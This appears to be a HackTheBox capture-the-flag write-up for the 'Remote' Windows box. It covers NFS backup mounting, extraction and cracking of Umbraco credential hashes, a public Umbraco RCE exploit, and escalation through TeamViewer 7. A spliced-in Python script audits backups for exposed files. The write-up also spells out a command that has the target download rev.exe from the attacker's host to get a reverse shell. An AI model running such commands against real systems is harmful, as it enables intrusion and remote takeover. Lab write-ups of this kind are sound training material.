![c3188b606d8943d147e162e47f51d6c5.png](4a8c67e643024c2f9bc5438bb7df6744.png) ![fc1829a82085cd6576f9b245213c77bb.png](ec727d2125d24302b186df2c27d61af3.png)

Interesting. FTP, a web server, and what looks like an NFS share that we can maybe mount. Let's check out the website.

![934d9b48ace9ff750232a5667a2bad8a.png](6691c9dc21bb4b33a583b309772a531c.png)

Looks to have some sort of blog. 'Umbraco'?

![9e12cd8aaf5aeb2bd91e22931f7f7b5a.png](62a7c5ffc8f6462c95a3580bdac3fc56.png) ![2eefa8535dc21aaf6a19c0c6d85ad48b.png](f435e26ac528441cbf5207f9bfc7b15c.png)

So we've found the login form by clicking 'Go to back office and install forms'. Nice. Default creds don't work here, so we'll come back to it. Let's see if there's anything to mount.

![680f38f1352bd58e6990fe5a2bbd6568.png](16b437cee6eb49e7b752e6e31dcf50b7.png)

Interesting, let's mount it!

`sudo mount -t nfs 10.10.10.180:/site_backups /home/kali/ctf/htb/remote/mount`

Exactly what it says: a full site backup. Since we know the backend is Umbraco, we can find the version in the `Web.config` file and credentials in the `App_Data/Umbraco.sdf` file.

Version:

![520d41fcddeb11a8b6fcf267b222d8a2.png](389bdf8b49584bc9a4ed0b57fe7b0250.png)

Creds: running `strings` on `Umbraco.sdf` and redirecting the output to a file, we can then run `head` on that file to see the creds.

`strings Umbraco.sdf > dbstrings`

![d161a01b667649ae7416a8474f6745a7.png](a77842f87aa6445795ba10fcb1144732.png)

So the admin password is a SHA1 hash. Crack it and log in using the form we found earlier: [email protected]:cracked password

Now that we have admin authentication and know the version, we can try to find an exploit. [https://github.com/noraj/Umbraco-RCE](https://github.com/noraj/Umbraco-RCE) This one looks promising and easy to use. Let's test it.

![53d7c91b60b9b320e109a837f28d0821.png](3e90ba42e1fa472e9181ab1653c5a7ab.png)

It works! We now have remote code execution.
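The backup mounted above leaked both the Umbraco version (`Web.config`) and the user password hashes (`App_Data/Umbraco.sdf`). Here is an added example, not from this writeup, of a pre-export audit that walks a backup tree and flags exactly those two artifacts; the directory layout and the version string are constructed sample data, not values from the box.

```python
import re
import tempfile
from pathlib import Path

# Umbraco 7 records its version in Web.config under this appSettings key.
VERSION_RE = re.compile(
    r'<add\s+key="umbracoConfigurationStatus"\s+value="([^"]+)"', re.IGNORECASE)

# Backup artifacts that leak version or credential material if exported.
# Paths are relative to the site root; Umbraco.sdf is the SQL CE database
# that holds the user table (and therefore password hashes).
SENSITIVE_FILES = {
    "App_Data/Umbraco.sdf": "SQL CE database with user password hashes",
    "Web.config": "reveals Umbraco version and connection strings",
}

def umbraco_version(web_config_text: str):
    """Return the umbracoConfigurationStatus value, or None if absent."""
    m = VERSION_RE.search(web_config_text)
    return m.group(1) if m else None

def audit_backup(root: Path) -> list:
    """Report sensitive Umbraco artifacts present under a backup root."""
    findings = []
    for rel, why in SENSITIVE_FILES.items():
        path = root / rel
        if not path.is_file():
            continue
        note = f"{rel}: {why}"
        if rel == "Web.config":
            ver = umbraco_version(path.read_text(errors="replace"))
            if ver:
                note += f" (version {ver})"
        findings.append(note)
    return findings

def build_sample_backup() -> Path:
    """Create a constructed backup tree in a temp dir (sample data, not the box)."""
    root = Path(tempfile.mkdtemp(prefix="site_backup_"))
    (root / "App_Data").mkdir()
    (root / "App_Data" / "Umbraco.sdf").write_bytes(b"\x00" * 16)  # stand-in blob
    (root / "Web.config").write_text(
        '<configuration><appSettings>\n'
        '  <add key="umbracoConfigurationStatus" value="7.12.4" />\n'  # constructed
        '</appSettings></configuration>\n')
    return root

if __name__ == "__main__":
    for line in audit_backup(build_sample_backup()):
        print(line)
```

Run it against the real backup root (instead of the constructed tree) before an export is shared; any finding means the share would hand out version and credential material to every client that can mount it.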
Let's get a proper shell.

![e6e5af2dd00a7214581bd1e5fb874d86.png](41b6aba2ef1b467b8f5b61dfe718b99e.png)

Transfer that executable to the machine using our RCE exploit:

`python3 -m http.server`

`python3 exploit.py -u [email protected] -p password -i 'http://10.10.10.180' -c powershell.exe -a '-NoProfile -Command Invoke-WebRequest -Uri http://10.10.14.22:8000/rev.exe -OutFile C:/Users/Public/rev.exe'`

Now that our shell is on the box, let's fire up the Metasploit listener.

![82db5def78ca10ed545e7801d0a63e1f.png](4727de30ccce4121a85f146eb913a836.png)

Trigger the shell and off we go. So let's enumerate this box a bit. I like winPEAS.

![3be04f754cd3a64f815b5390d869846b.png](dda8d988c67f457b8f16b988c392955d.png)

Drop into a shell and run it.

![c64af1859dc8c8c98f97ebd0d4caf3e3.png](e7819098fd2d488eb6fccb2611212600.png)

Interesting. Looks like TeamViewer 7 is running. That's vulnerable. Let's target it. Terminate your shell (ctrl+c) and background (bg) your meterpreter session.

![6e642346f530eb72c3cd0fdc3878b726.png](c18eb17cb4b94d6abf48669e40e1242d.png) ![27ca70314635b1b07a3fd56cef9aa236.png](abdd00a2abc74d9596eca64ac2aa8472.png)

Could that be the admin password? Let's use evil-winrm to check.

![51dc6c697729e18dc164a8aa7f4447be.png](808a161f567041f486cbe465dcc97ffe.png)

Successfully rooted.

![44e8359e967709fd4a52b279c7095cbf.png](d83298ac607441a794c0f6c492503f5d.png) ![27421801b8950549bd5ef04345ef653a.png](45bea55163274c2d9d20f8deb1332616.png)

---

Back to [[HackTheBox Index]]

Tags: #htb #hackthebox #nfs #box_writeups #umbraco #hashcracking #metasploit #windows #teamviewer7 #evil_win_rm

Related: